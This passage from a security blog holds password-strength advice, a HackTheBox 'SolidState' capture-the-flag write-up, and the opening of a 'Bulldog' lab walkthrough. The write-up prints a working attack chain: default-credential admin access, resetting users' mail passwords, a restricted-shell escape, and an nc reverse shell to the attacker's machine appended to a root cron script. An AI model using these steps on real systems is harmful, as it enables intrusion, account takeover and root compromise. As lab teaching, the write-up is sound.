haven\u0026rsquo;t logged onto it yet with.\nGo to https://www.turnon2fa.com/ and follow instructions for all the platforms you wish.\nYou might wish to change all your passwords to more unique, secure ones. I wouldn\u0026rsquo;t necessarily call that a small step, however. However, if you have being reusing passwords across different accounts, CHANGE THEM ALL.\nProperties of A Good Password - The Short Version # If you\u0026rsquo;d like to see the longer version of how to create a good password, check out the post containing data from the Probable Wordlists\nActionable Password Advice Based on the Probable Wordlists 31 January 2018 Archive Why unique passwords matter, what makes them vulnerable to attack, and how to create strong yet memorable ones - based on the Probable Wordlists v2 Password Length Is Most Important # The common minimum for password length is 8 characters, I recommend a minimum length of 12. One way to break passwords is brute force. There are a lot of character combinations and they just try each one. Depending on length, this can take a very small or ASTRONOMICALLY ENORMOUS period of time.The time it would take an average computer to try all combinations of 16 letters and numbers is 44 Million Years.\nCharacter Diversity # The majority of passwords in leak files today use only letters and and numbers. Buck this trend to make your password obscenely less likely to be brute forced. The time it would take an average 2018 computer to generate all combinations of 16 letters, numbers and symbols is about than 9 times larger than the current age of the universe.\nPasswords Should NEVER Contain Biographical Information Or Anything Easily Found Online # Never include the name of your hometown, High School, pets, etc. in your passwords.\nWhy would a cracker brute force from all possibilities when instead they could harvest common biographical information? My BEWGor Script can generate millions of passwords based on this easily found information. If it can generate that password based on your dog\u0026rsquo;s name and the house number of your childhood home, so can anyone else.\nMore Password/Identity Security Measures # Beware of Scams! # Scams to steal your information run rampant. You don\u0026rsquo;t need to be an idiot to fall for them, either. These scams are specially designed to fool people, and they work.\nReal tech support does not send unsolicited emails or other communications that say you need to change your password and must \u0026ldquo;click here\u0026rdquo; to do so. If you are asked to do this, some one is trying to scam you.\nIf IT or someone other qualified entity needs access to your accounts, be careful:\nMake sure they are who they say they are. Phone numbers can be spoofed, someone might drop your boss\u0026rsquo; name, ask your manager, etc. This alone defeats many scams. If possible, set a temporary password for the duration of the time access is needed. When done, set the password back, or to something new. Check For Leaks # Passwords are leaked at an alarming rate. Every day, thousands (if not tens, or hundreds of thousands) of credentials are published online. The odds are that one day, this will happen to you. It might not be due to any fault of yours, but it will happen. Run your email addresses through Hacked-Emails every once in a while to see if your address appears. There is some nuance to your address showing up on a list, however.\nHacked-Emails will show email dumps, even if they aren\u0026rsquo;t paired with passwords. Your email address may already be public information. You might freely distribute it on your business card or website. While you might get an increase in spam, or phishing attempts, your email address being well known usually isn\u0026rsquo;t the end of the world.\nInstead of being paired with plaintext passwords, the emails may be paired with encrypted password hashes. While not uncrackable, your long, complicated password may stand up to even the most advanced hash cracking attempts.\nEven if your password is published in plaintext, it might not be the password to your email itself. You might have used your email address as a username at a website, and the password given belongs only to that website. This is why you aren\u0026rsquo;t reusing passwords.\nChange Your Passwords Regularly, But Not TOO Regularly # It\u0026rsquo;s no longer considered good advice to tell people to change their passwords every few months. In practice, this has lead to pseudo-reuse. \u0026ldquo;I\u0026rsquo;m not going to be able to remember a completely different password! I\u0026rsquo;ll just add a number one at the end of my old one.\u0026rdquo;\nIt still is wise to change your passwords once in a while, however. If somehow, someone has compromised your full credentials, they might not make this information public. If they dump the information or sell it online, the likelihood that you will be notified of the breach goes up. They might have put a lot of time and effort into cracking a list of credentials that includes yours, and a change of the credentials might render that effort useless.\nUse A Password Manager # If you want to go the next level and have your passwords remembered for you while still being secure, there are password managers. This has the added benefit of preventing you from the danger of keystroke capturing software and phishing attempts - which is when they try to trick you into typing in a real password at a fake website. Many managers offer Two-Factor authentication, password report cards, password age monitoring and secure password generation. Their use is recommended by Information Security professionals around the world.\nThanks for reading!\n","date":"8 February 2018","externalUrl":null,"permalink":"/blog/password-advice-for-everyone/","section":"Blogs","summary":"Essential steps to secure your accounts: use unique passwords, enable 2FA, and avoid common password mistakes.","title":"Password Advice for Everyone","type":"blog"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nOverview # This document will show why you need a unique, secure password. It then will describe what the least unique passwords have in common, and why they are catnip for password cracking software. Finally, I\u0026rsquo;ll show you how to create a more unique password that bucks the trends while still being memorable.\nIn order to get a better idea of the trends of secure and insecure passwords, I ran a portion of my Probable Wordlists through DigiNinja\u0026rsquo;s Pipal analysis tool.\nIf you\u0026rsquo;d like to get right to the findings, scroll right to the Results section.\nCaveat: Following this guide will make it harder for an attacker to compromise your password via brute force. However, there may be no way to become 100% secure. A person dedicated to determining a password has many tricks at their disposal. Sophisticated threat actors will use a combination of methodologies in this process. A password that is extremely resistant to brute forcing may still be stolen via social engineering or malware. Always exercise caution.\nBackground # What Can A Password List Tell Me? # A giant list of passwords sounds useful, but what can I do with it?\nYou could search through it for your passwords. If they\u0026rsquo;re found, you rush to change them. If they aren\u0026rsquo;t, you think \u0026ldquo;Phew, that\u0026rsquo;s a relief.\u0026rdquo; In both cases, you are likely to simply move on and stop thinking about password security.\nYou might share the list with a few friends, or you might revisit the list the next time you come up with a new password, but it\u0026rsquo;s entirely possible that you don\u0026rsquo;t continue to give your passwords much thought. We have a lot to worry about, and not spending days worrying about password security is hardly a personal failure.\nIt\u0026rsquo;s possible that the only times you think about how secure or unique your passwords are, or even consider password security as a whole, is when you hear about leaks. A headline will appear talking about how a record-breaking breach resulted in passwords blasted all over the internet. Experts appear and tell us that foreign governments and gangs are after our information and that the sky is falling. You might get concerned for an afternoon, but what else can be done? We know that identity theft happens, but that\u0026rsquo;s what the protections at our banks are for - right? They\u0026rsquo;ve got it all under control, of course! Surely, the sky isn\u0026rsquo;t really falling - why not leave this problem to \u0026ldquo;the cybersecurity people?\u0026rdquo;\nThe truth of the matter is that \u0026ldquo;the cybersecurity people\u0026rdquo; are working hard to make the internet a safer place. Security is a complex problem, however, and everyone can play a role. User participation in cybersecurity measures need not be intense or even difficult. We can find parallels in other aspect of our lives. Allow me to create an overly dramatic analogy.\nA Quick Trip To The Gym Ends With Shame On Your Family # Consider a gym locker. For this analogy, our locker is a simple box with a loop to thread your lock into. It doesn\u0026rsquo;t have a built in combination dial or key you pick up from the front desk. After doing your research, you\u0026rsquo;ve purchased a brand new, top-of-the line combination lock. It really is a marvel of modern locksmithing. There is no such thing as an impenetrable lock, but this one is pretty close. You have reinforced titanium parts that can\u0026rsquo;t be cut without industrial-strength equipment, a bulletproof mechanism that can\u0026rsquo;t be defeated without hours of tedious work, and plenty of other, easier targets organized into neat rows nearby. Your lock seems pretty secure, and you feel comfortable that the solid-gold pocketwatch you promised your grandfather on his deathbed to never leave at home is going to be there when you finish your workout.\nWhat would your kind, wise, old grandfather think if he found out someone had managed to get through this carefully crafted security system, seizing the priceless family heirloom because his grandchild had used a combination of 1234?\nHere, the \u0026ldquo;security people\u0026rdquo; are locksmiths. They did everything they could to create a secure system for you to protect your belongings. Measures had been taken against picks, shims, jimmying, prying, hammers, and scores of other methods of defeating their security system, only for all of them to be rendered useless by an owner who didn\u0026rsquo;t want to take an extra moment to come up with an uncommon combination. An owner who now, after returning to an empty locker, needs to walk home in the rain without their jacket, pray someone is at home to open the door for them, and then prepare to call grandma and tell her that a piece of the family\u0026rsquo;s soul is probably sitting in a pawn shop window.\nActionable, Data-Supported Advice # I did say the analogy was going to be overly dramatic, but I hope the implications are clear. The best security systems can be defeated the user is careless. You don\u0026rsquo;t have to become a certified cybersecurity expert, but small changes can make a huge difference. If you use the right password generation techniques, it will be astronomically harder for anyone to brute force your password.\nArmed with DigiNinja\u0026rsquo;s Pipal, I performed an analysis on the list of the Top 32 Million Most Common Passwords. This isn\u0026rsquo;t the largest list in the repository, but it is sizable enough to encompass notable trends. Pipal provided valuable data to interpret and chart. These findings provide actionable, data-supported information that is useful to everyone, even if your passwords weren\u0026rsquo;t on the list.\nPasswords included in this analysis appeared at least 10 times in the Probable Wordlists Rev 1.2 Files.\nResults # Advice based on data from each analysis are included on the charts themselves.\nThe Power of Hashcat and Other Cracking Tools # No password is uncrackable. Modern password cracking tools are very powerful. However, a password that is strong, unique and bucks common trends will be the hardest to guess via brute force masking and dictionary attacks.\nThe logic here is simple: if your password isn\u0026rsquo;t on an attacker\u0026rsquo;s wordlist, it cannot be guessed via dictionary attack. If your password doesn\u0026rsquo;t match the common patterns, it will take a brute force attack much longer to guess it.\nLet\u0026rsquo;s look at an example: password17 If a password cracker is brute forcing passwords using a pattern of eight lowercase letters followed by 2 digits then our password is going to be guessed. A simple brute force attack starts at aaaaaaaa00 and covers all possibilities until it gets to zzzzzzzz99. Along the way, it will land on password17. This might not happen quickly, but it will happen.\nSoftware like Hashcat has the ability to use hybrid attacks that combine a dictionary and a brute force mask. If this dictionary plus mask attack was using a list of the most common passwords and appending a 2 digit number on to the end, then password17 doesn\u0026rsquo;t stand a chance! At the number 2 most common password, it would take just 117 guesses (all 2 digit numbers appended to the No. 1 most common password + 17 guesses using password) to hit the bull\u0026rsquo;s eye. Keep in mind that this does not mean a cracker is manually typing in password00, password01, password02, until they get a hit. An algorithm, often accelerated by a GPU, performs this process in milliseconds.\nThe dictionary word plus numbers format is very common, and guessing password candidates that match this pattern may be one of the first strategies a cracker might employ. The ability to append numbers at the end of words is included in the Hashcat default \u0026ldquo;rule\u0026rdquo; set. Rules create mutations of wordlist items that are used in a dictionary attack, and will create candidates based on strategies like swapping every letter S for a $ and other common substitutions.\nThis mutation functionality may render passwords that may appear to be secure due to character choice and character order easily guessable. password can be mutated into something like P@$$w0rd - which some password \u0026ldquo;strength\u0026rdquo; algorithms might rate as strong. It\u0026rsquo;s got capital and lowercase letters, special characters and numbers! How could it not be secure?! Well, easily.\nThe l33tspeak phenomenon has been around for some time now, and it doesn\u0026rsquo;t take a Nobel Prize winner to guess that s can be swapped for $. Theoretically, almost @ny $3nt3nc3 c@n b3 \\/\\/r1tt3n 1n 1337 and still be legible. If you can read that, then you can figure out how to write a a rule to create mutations yourself. (If you couldn\u0026rsquo;t read it, the l33t section reads \u0026ldquo;any sentence can be written in leet\u0026rdquo;)\nMutations of dictionary words and other common passwords are easy to guess, and shouldn\u0026rsquo;t form your entire password.\nMake Your Password Buck the Trends With These Tips: # Let\u0026rsquo;s walk through the process of taking a weak password, based on a dictionary word, and altering based on the advice based on the data from this analysis. When we are done, it will be statistically much harder to guess. However, don\u0026rsquo;t use our final product as your password! Here it is published online!\nStarting password: noodle\nAbout 90% of passwords used soley lowercase letters and numbers. 47% used lowercase letters alone. noodle17\nSpecial Characters appeared in fewer than 4% of the passwords Uppercase Letters appeared in fewer than 1%! 35% of passwords solely used letters followed by numbers Use special characters and capital letters! Hit that shift key! Noodle-17\nJust 0.02% of passwords on the list began with special characters.\nCharacter order matters!\n-Noodle17\nMore than 91% of passwords had lengths between 8 and 14 characters. 23% of the passwords used exactly 8 characters. About 40% of passwords ended in a number Make 13 or 14 your minimum password length and you\u0026rsquo;ll be like the rare 9% Pad your password with special characters and relevant words using capital letters to make it longer and even harder to guess -Noodle-17-SOUP-\nThe most \u0026ldquo;natural\u0026rdquo; way to include a capital letter is to capitalize the first letter of the dictionary word. Don\u0026rsquo;t let that be your only capital! If it\u0026rsquo;s natural for you, it would be natural for the crackers as well. We started with noodle, and ended up with -Noodle-17-SOUP-, which includes lowercase letters, numbers, capital letters (and not only at the beginning) and \u0026ldquo;friendly\u0026rdquo; special characters. Not all systems allow for things like spaces, stars, and ampersands to be part of a password. This results in the very infrequent use of these characters in passwords. This is due to the handling of the password systems themselves, which might use some special characters for control.\n-Noodle-17-SOUP- is much harder to crack than noodle, and is even harder to crack than n00dl3$0UP which might be mutated out of dictionary words.\nThanks for reading!\n","date":"31 January 2018","externalUrl":null,"permalink":"/blog/actionable-password-advice-based-on-the-probable-wordlists/","section":"Blogs","summary":"Why unique passwords matter, what makes them vulnerable to attack, and how to create strong yet memorable ones - based on the Probable Wordlists v2","title":"Actionable Password Advice Based on the Probable Wordlists","type":"blog"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # From a bird\u0026rsquo;s eye view, SolidState is a beginner’s CTF.\nHowever, if you are able to solve it, you are well on your way to the more intermediate level CTFs. This box requires actual enumeration, exploit research and investigation, and prior knowledge. It is a great test of your ability to understand what exactly you should looking for while enumerating. It’s a fun one.\nThere is a key concept that you will have to know about ahead of time. The box does not offer much in the way of a hint in it’s direction.\nI was able to solve it by browsing through Ben Clark’s Red Team Field Manual and researching enumeration and privilege escalation guides online.\nShoutout to g0tm1lk and mubix for excellent PrivEsc and Enumeration guides.\nThis write up assumes that the reader is using Kali, but any pentesting distro such as BlackArch will work. The tools come with a stock Kali installation, unless otherwise mentioned.\n1. Initial Scans # Before anything else, I added the IP to my /etc/hosts for convenience as solidstate.htb\nI began with my benmap.sh script, which runs nmap in stages.\nThe most important outputs came from an nmap command that was similar to\nnmap -F solidstate.htb Our scan finds the box is running\nSSH at port 22 SMTP at port 25 HTTP at port 80 POP3 at port 110 NNTP at port 119 Ports 25, 110 and 119 all seemed to contain software named James, a solid place to begin investigating. However, I like to start with HTTP scans. I set those in motion before investigating James.\nnikto and dirsearch are must-runs when investigating HTTP.\nnikto -h http://solidstate.htb -o nikto_result.txt I like to do my web directory bruteforcing with dirsearch.\ndirsearch -u http://solidstate.htb -e php,txt,html,jpg,gif,htm,js,aspx --plain-text-report=dirsearch_quick_result I’ve included the results here, but I began digging at James before they had finished.\nJames runs on SMTP and POP3, it might be some kind of email-related service. Maybe findsploit has something interesting\nfindsploit james That RCE script matches our James version. Why not just run it and see if we get RCE?\n\u0026ldquo;Payload will be executed when someone logs in.\u0026rdquo;\nWho is going to log in, though? Another HackTheBox user? I’d rather not wait for that.\nRCE usually entails some sort of powerful access. There has to be something we can dig out of the module itself.\n2. Enumerating James # If we look into the exploit code, we might be able to determine what gives the exploit its effectiveness and redirect it in some way.\nThe exploit script contains credentials! Both username and password are root - real top-notch security.\nJust for the hell of it, I tried ssh root@solidstate.htb with the password root This didn’t work, unsurprisingly.\nThe exploit is attempting to connect to port 4555. Maybe we can do that ourselves using nc ?\nnc solidstate.htb 4555 Use root as both username and password when asked.\nhelp tells us about the ability to create a new user. Will our new user have access to the system in some way? Let’s see what happens.\nadduser frank beans quit Frank is here to cause trouble, but what can he do? Our nmap scan provides some guidance.\nSMTP is used to send emails. POP3 is used to read emails. NNTP is for Usenet, which I know nothing about. If we run out of ideas, we\u0026rsquo;ll come back to this. It’s pretty unlikely someone is going to be sending Frank any new emails. However, it is possible that James has some automated features in place to get our \u0026ldquo;new user\u0026rdquo; up to speed.\nWill Frank get an email containing a randomly generated SSH password? We better check his inbox at the POP3 port.\nnc telnet solidstate.htb 110 didn\u0026rsquo;t work. How can we connect to this port? I searched online for an answer.\nEventually, I found that POP3 can be communicated with over telnet. I had never used POP3 commands before, but a quick online search showed it wasn\u0026rsquo;t tough to operate.\ntelnet solidstate.htb 110 USER frank PASS beans LIST - this command shows information on messages for the current user No messages for Frank. The interface on port 4555 also allowed me to change the passwords for the other users. Maybe one of them has something interesting in their inbox?\nnc solidstate.htb 4555 listusers (This is detailed in the image below)\nWe see a username with bash_completion.d exists, I bet this was created by the exploit script we ran earlier. If there aren’t any interesting emails, we will look into that.\nUsing the setpassword command, we can set all passwords to beans.\nIt wasn\u0026rsquo;t very likely, but we should see if beans gets us SSH access to any of the accounts.\nIt didnt.\nOh well, now we can use the same email-checking process we used for Frank, but for all the users.\nWe start with mailadmin and james - but quickly find that neither had any mail.\nSo, we move on to the other users, going down the list and checking inboxes. All but one turns up empty.\nMindy has two emails for us.\nRETR 1 Mindy is a new hire at SolidState security. Perhaps their IT system gives them some sort of changeme type of password at first? Worth a try. Let’s see what is behind email door #2, first.\nRETR 2 ...Here are your ssh credentials... username: mindy pass: P@55W0rd1!2@ How nice of them to communicate these in the CLEAR via email.\nPasswords in plaintext emails is not a great idea. After we exploit her credentials, maybe Mindy can get this organization to abandon this practice.\nssh mindy@solidstate.htb 3. Mindy\u0026rsquo;s Great Escape # As soon as we log in, we see that something is fishy here.\nLook at all this mess in the terminal, let\u0026rsquo;s clear it away.\nNo clear? That can\u0026rsquo;t be good. I hope I can grab the user flag, at least.\nUser flag captured!\nThe fact that we can\u0026rsquo;t use clear or most other commands is intolerable.\nI didn\u0026rsquo;t know what was causing such a limited shell, so I tried the a command to gain a tty.\npython -c 'import pty; pty.spawn(\u0026quot;/bin/bash\u0026quot;) Unfortunately, this didn\u0026rsquo;t do the trick.\nWhat other information do we have?\nWell, when I tried clear, the error message included the term rbash.\nWhat does rbash mean?\nI did a quick search online which lead me to this SANS article. It was my understanding that as soon as we logged in with ssh, the system locked us into the restricted shell.\nBefore doing this box, I had done Bandit at overthewire.org. One of the levels was solved by running ssh with another command \u0026ldquo;attached.\u0026rdquo; This attached command would run faster than an automatic kick user command, allowing the user to maintain access.\nPerhaps that method could be deployed here?\nI tried to combine the idea of running a command in tandem with the ssh command with the ideas in the SANS paper. This is what I came up with:\nssh mindy@solidstate.htb vi Then, from within the vi text editor, running :!bash.\nThis line runs vi before the system can apply rbash. Then, we can take advantage of vi\u0026rsquo;s ability to run shell commands from within the text editor to start a bash shell.\nWhile this did work, I ultimately found a more elegant method.\nssh mindy@solidstate.htb bash bash itself is run as a command, skipping the vi step. This shell still doesn\u0026rsquo;t have a tty, but that isn\u0026rsquo;t anything our Python command can\u0026rsquo;t fix.\npython -c 'import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;)' 4. Enumeration # Armed with a decent shell, it\u0026rsquo;s time to get some information about the system.\ncat /etc/*release* tells us we are dealing with Debian. Ubuntu CTFs don\u0026rsquo;t like the simplest nc reverse shell, but vanilla Debian machines do! I haven\u0026rsquo;t memorized any of the reverse shell commands yet, but nc local.machine.ip.addr PORT -e /bin/bash isn\u0026rsquo;t hard to remember.\nsudo -l is worth a shot, since we have Mindy\u0026rsquo;s password.\nUnfortunately, we find out that Mindy doesn\u0026rsquo;t have access to sudo.This might mean we have to exploit or RevShell our way to root.\nTo start enumeration, we do a quick ls in some commonly used directories like /home and /opt.\n/home came up empty at first glance, but /opt held promise. We know the system is running james - so maybe there are some useful configuration files.\nls /opt ls -la /opt One of these files is noteworthy: tmp.py. It is owned by root, but we have write permissions. I smell a PrivEsc!\ncd /opt cat tmp.py This script seems to just erase the contents of the /tmp folder. Is the root user expecting me to put something in there? If they didn\u0026rsquo;t want us to store things in /tmp/ I\u0026rsquo;m sure there is some other method that could prevent us from doing so. Even if we were prevented from writing to /tmp, we can put things in another directory like /dev/shm\nrm -r /tmp/* seems like the kind of command that would be run repeatedly, on a regular asis.. If it was just going to be run once, the root user would just run the command. It\u0026rsquo;s likely that this script is run automatically, and likely periodically. Does root run it with a cronjob?\nRambling, Skippable Side Note # It wasn\u0026rsquo;t until I had already been attempting this box for some time did I learn about the existence of cronjobs. I had to come across the concept in my other attempts to familiarize myself with Linux. This underscores a need to understand the fundamentals of the OS. If you don\u0026rsquo;t understand the OS, it is a lot more difficult to exploit it.\nThe idea for cronjobs being important here is hinted at by the name. Solid-State implies no moving parts. Thematically, this concept is the opposite of this box, which runs a script without any user input.\nMy academic background included classes on circuit design, and the term Solid State got conflated with the concept of steady-state. This confusion ended up helping me put the pieces together. When introduced to time-dependent circuitry, such as LC circuits, problems often include an important phrase.\nAssume that at t=0, the circuit had been in steady-state for a long time.\nThis is meant to convey that the circuit had been unchanging until we began obvserving it. At this point, connections are made and any stored energy in capacitors or inductors begins to move around.\nMixing up Solid-State and Steady-State - I ended up stumbling upon the key concept.\n5. Waiting For the Root to Sprout # If the script is run as a cronjob, then we just need to add a line that starts a reverse shell. Since the script would be executed as root, the created shell would have root privileges.\nWe want to catch this shell as soon as the command is sent, so let\u0026rsquo;s set up our listener before altering the script.\nOn our local machine, we run:\nnc -lnvp PORTNUM Next, we need to edit the script to include our revshell command. But, before we do this, let\u0026rsquo;s make a copy of the original tmp.py - in case we bungle our editing process.\ncp /opt/tmp.py /dev/shm/copy.py I did not do this while editing, made a typo and ended up having to reset the box.\nWe can\u0026rsquo;t write it to /tmp, since that gets cleaned out with our script. We can\u0026rsquo;t write it to /opt, since we don\u0026rsquo;t have permission. /dev/shm is a good location. We have write access, and it is cleared upon reboot.\nThe original, unedited script contains a nice example on how to run bash commands from within python.\nimport os import sys ... os.system(\u0026#39;BASH COMMANDS\u0026#39;) We can use this method with our own, shell-spawning bash commands. Append the command for the simple nc revshell onto tmp.py using echo and \u0026gt;\u0026gt;\necho \u0026quot;os.system('nc local.machine.ip.addr PORTNUM -e /bin/bash')\u0026quot; \u0026gt;\u0026gt; tmp.py Make sure your PORTNUM matches the listener.\nWith the trap set, all we have to do is wait for the cronjob to run. If the process takes more than 5-10 minutes, you have done something wrong. Start by checking for typos, incorrect IPs, ports, etc.\nSoon\u0026hellip; # The root shell pops open in our 2nd listener!\nFrom here we can do as we please, starting with the capture of the root flag.\ncat /root/root.txt\n7. Conclusion # My experience with this box underscored how important it is to actually be familiar with the territory. I haven\u0026rsquo;t been using Linux very long, and there is so much to know, so much that MIGHT be useful, that it can be paralyzing to find a place to start.\nIn this instance, I was able to find a foothold based on context and some prior knowledge. But I got a bit lucky. There have been boxes that stumped me because I knew there was something I just hadn\u0026rsquo;t learned yet.\nTime to crack open some books.\nThanks to HackTheBox and ch33zplz for this CTF!\n","date":"27 January 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/solidstate-htb/","section":"Archive","summary":"","title":"CTF Writeup: Solid State on HackTheBox","type":"archive"},{"content":"","date":"23 January 2018","externalUrl":null,"permalink":"/tags/first-ctf/","section":"Tags","summary":"","title":"First-Ctf","type":"tags"},{"content":"","date":"23 January 2018","externalUrl":null,"permalink":"/series/firstctf/","section":"Series","summary":"","title":"FirstCTF","type":"series"},{"content":"","date":"23 January 2018","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nBefore We Start # Make sure you have set up your system according to the instructions in *Part One!\nWe\u0026rsquo;ve set up our VM\u0026rsquo;s, connected them to each other and are ready to boot. Let\u0026rsquo;s get into \u0026ldquo;character.\u0026rdquo;\nBulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don\u0026rsquo;t you find out? :)\nAs a white-hat penetration testing team, we have been asked to test the new protections set up after the initial hacking. This type of internal testing is broken up into to two groups: the Red Team and the Blue Team. These choices loosely align with \u0026ldquo;offense\u0026rdquo; and \u0026ldquo;defense\u0026rdquo; respectively. The blue team has set up a system they believe is more secure than what it was before, and it is our job as the red team to find out how true that is.\nOur flag-capturing, root-accessing process will go something like this: (The terms below are not standard, I am using them organize the process for you)\nGetting Connected Information Gathering - What does the box offer? Where should we look? External Observation/Reconnaissance - Finding vulnerable points from the outside Gaining Low-Privilege Access to the System - Attempting to gain access and pop a \u0026ldquo;user\u0026rdquo; shell Internal Observation/Enumeration - finding vulnerable points from the inside Privilege Escalation - Gaining root access by via exploit, misconfiguration, or by taking advantage of privileged information insecurely stored. The above process is not up to the standards used by professionals, and is meant to be more of a base to build a more comprehensive process of your own. It aims to simply demonstrate a general outline of the steps we need to perform in order to get the flag. There are many standards for penetration testing, and the Penetration Testing Execution Standard is a great outline.\n1. Getting Connected # Locating the Target # Let\u0026rsquo;s get our tools ready to work - Boot up your Kali VM. Upon boot, type ifconfig and ensure it has been automatically assigned a host-only IP address starting with 192.168.56.xx\nBefore we do the same for Bulldog, we want to make sure we don\u0026rsquo;t miss an opportunity to learn something. Bulldog is set up to show us its host-only IP on startup.\nWe can look at this if we want to confirm the IP, but why miss the opportunity to learn how to use Kali to identify it?\nThe Bulldog VM will run in the background, even if we aren\u0026rsquo;t looking at it. and we will be interacting with it entirely through Kali. Therefore, shortly after boot, we can simply minimize it. If you accidentally view the IP, it isn\u0026rsquo;t the end of the world.\nPREVENT SPOILERS! # Minimize Bulldog right after boot while the screen looks something like this:\nReturn to your Kali VM. From this moment on, we will not need to exit it until Bulldog is conquered.\nWe know a little bit about our target system due to our setup process. It is being run through Virtualbox and is connected to a network with addresses containing 192.168.56.xx We also know our own system\u0026rsquo;s IP. These three pieces of information will allow us to find the IP of the target.\nTime to meet your first tool: nmap\nThe nmap network mapper is a fantastic tool for any kind of network interactions. It can show you information computers on a network may \u0026ldquo;know\u0026rdquo; about one another, but aren\u0026rsquo;t necessarily obvious to the user. nmap can scan for vulnerabilities, identify software versions and much more.\nFirst, we will use it to sniff out the Bulldog.\nIf you run man nmap you can spend some time reading about all the flags and many functions. For, now we just need one flag: -sn\nThe -sn flag tells nmap to just send a ping to each address in a defined scope. It will use your computer to send out pings to each of the addresses, and tell you if any of them respond.\nBulldog is hiding somewhere between 192.168.56.0 and 192.168.56.255, so let\u0026rsquo;s scan that range. The shorthand used for this range is 192.168.56.0/24 The 0/24 syntax is what is called \u0026ldquo;CIDR\u0026rdquo; notation.\nLet\u0026rsquo;s run the first command of the pentest.\nnmap -sn 192.168.56.0/24\nnmap is able to read the unique hardware address of each device found. It can look up the first parts of these addresses to associate each device with a possible manufacturer. In our case, we get two boxes with a network interface \u0026ldquo;manufactured by\u0026rdquo; VirtualBox.\nSince we only have two hits from VirtualBox machines, and we know our machine\u0026rsquo;s IP, we know which one is Bulldog.\nYou may see two other devices that are not VirtualBoxes. One of these is the Host OS itself, and the other is the host-only network\u0026rsquo;s DHCP server. The DHCP server automatically assigns IP addresses to the devices on our network.\nnmap may have given you an error about DNS if Kali is not connected to the internet. We can ignore such an error. Since we are not t connected to the internet, Kali\u0026rsquo;s attempts to translate the IP addresses it finds into human readable formats using a DNS Server will fail. That\u0026rsquo;s okay, we have another way of identifyin bulldog.\nAdding Bulldog to Your Hosts File # It can be a bit cumbersome to type in 192.168.56.102 every single time, so we are going to set up a shortcut.\nAt /etc/hosts, we have a file that contains these \u0026ldquo;shortcuts.\u0026rdquo; These are called hostnames. If we add a line pointing our IP to a name like bulldog.ctf we can save ourselves some trouble.\nIF YOU MAKE A TYPO HERE. YOU CAN MESS UP YOUR SYSTEM!\nIf you accidentally use \u0026gt; instead of \u0026gt;\u0026gt; - your host file will be overwritten! This will require a manual fix - don\u0026rsquo;t let it happen.\nAdd the IP address to your hosts file using this command:\necho \u0026quot;192.168.56.102 bulldog.ctf\u0026quot; \u0026gt;\u0026gt; /etc/hosts\nRun ping bulldog.ctf to see that your system has associated the address to the hostname bulldog.ctf\nLet\u0026rsquo;s create a working directory for our pentest, and we\u0026rsquo;ll get started in earnest.\nmkdir bulldog \u0026amp;\u0026amp; cd bulldog\n2. Information Gathering/Reconnaissance - What are we looking at? # Enumerating Bulldog from the Outside # Now that we have found Bulldog\u0026rsquo;s address, we have exhausted all the info we have. What IS Bulldog? Is it running a website? Hosting files? Can it run doom?\nnmap\u0026rsquo;s -sV flag can answer all of these questions.\n\u0026ldquo;Scan Versions\u0026rdquo; attempts to identify what services the box is running at what ports, and what software version it uses to do so.\n-F enters \u0026ldquo;Fast\u0026rdquo; Mode - this only scans the Top 100 most popular ports. This is usually enough to find something interesting. If none of these ports produce results, we can scan deeper and see if we find additional information.\nFor all of our scans, we are also going to run a quick, hacky little logging method.\nCOMMAND | tee COMMAND_output.txt\nThis will save our tool\u0026rsquo;s terminal output to a textfile in the bulldog directory - as long as it is our working directory. If we wanted to write a report, repeat our process quickly, or just forget a result, it pays to have logs.\nRun nmap again to scan Bulldog, making sure to log the output.\nnmap -sV -F bulldog.ctf | tee nmap_quickscan.txt\nThis scan has already provided plenty of useful information:\nSSH (a secure remote command line) is running, but on a non-standard port. Normally SSH is port 22 We know that the version of SSH it is running is for Ubuntu - we now know Bulldog is running Ubuntu! Ports 80 and 8080 are running HTTP - there is a website for us to visit. The web hosting service is based on Python 2.7 - Bulldog runs Python, version 2.7 Let\u0026rsquo;s investigate the website in our browser:\nWe can find the main page and the /notice page, but nothing on either seems particularly interesting. Viewing the sources on the pages is possible, but nothing there jumps out at us either.\nThere is a way for us to dig into this website a bit deeper.\nDirectory Bruteforcing # We suspect there is more to this website than the 2 pages we have seen, but we haven\u0026rsquo;t found any links to take us anywhere else. There might be some pages like /mail, /login, or other common names, but we don\u0026rsquo;t want to just type them in manually in the browser.\nEnter dirb This tool that will take a wordlist of common webpage names, append them to a URL and simply check if they exist. We can feed it different flags in order to do things like dig deeper, look for extensions like .php and more.\ndirb http://bulldog.ctf -r | tee dirb_result.txt\nThe -r flag tells dirb NOT to search recursively. When you do your own CTFs, you may not want to enable this option, but we will use it here to demonstrate our process while keeping things light. If we wanted to, we could specify a wordlist for dirb to use, but the defaul will serve our needs just fine.\nWe get 3 hits - /admin, /dev, /robots.txt\nProbing the Website for Avenues of Attack # Let\u0026rsquo;s start with /robots.txt - since that might contain the names of some restricted areas. Ideally, a robots.txt file forbids certain webcrawlers from accessing the pages they list. This might prevent a program like dirb from getting a complete result.\nHowever, if we know there is a robots.txt, we can simply visit it in the browser and read the entries with our eyeballs.\nThe BlackHat German Shepherds have left the mark of a truly skilled hacker - ASCII ART! There is nothing else here. It is just a .txt - so there is no source to view.\nWhat does /admin have to offer?\nThis page\u0026rsquo;s gives us two key pieces of information just by existing:\nThe site can be logged into - giving us a possible avenue of attack \u0026ldquo;Django\u0026rdquo; is a potentially useful term Even if you don\u0026rsquo;t know what Django means in this context, useful terms like this may lead to productive searches in the future.\nSome potentially interesting info lies in the page source, but there may be some lower hanging fruit on the /dev page. It can be tempting to dive deeply into one aspect of a CTF right off the bat, but resist the urge. So far, my (somewhat limited) experience has shown that reconnaissance should focus on breadth before depth.\nThis page is full of information, laid out for us by the designers themselves. Here are the key points:\nThe previous attackers had a good strategy, but odds are we won\u0026rsquo;t be able to recreate it entirely. Several things are listed as NOT present: PHP, CMS (like Wordpress), MongoDB, etc. We can cross these off our our list of possibilities. SSH is available, in addition to a Web-Shell of their own design (linked to on the page) A custom-made program is in the works, but isn\u0026rsquo;t finished yet A team hierarchy as well as contact information. If this were a real company, this could be 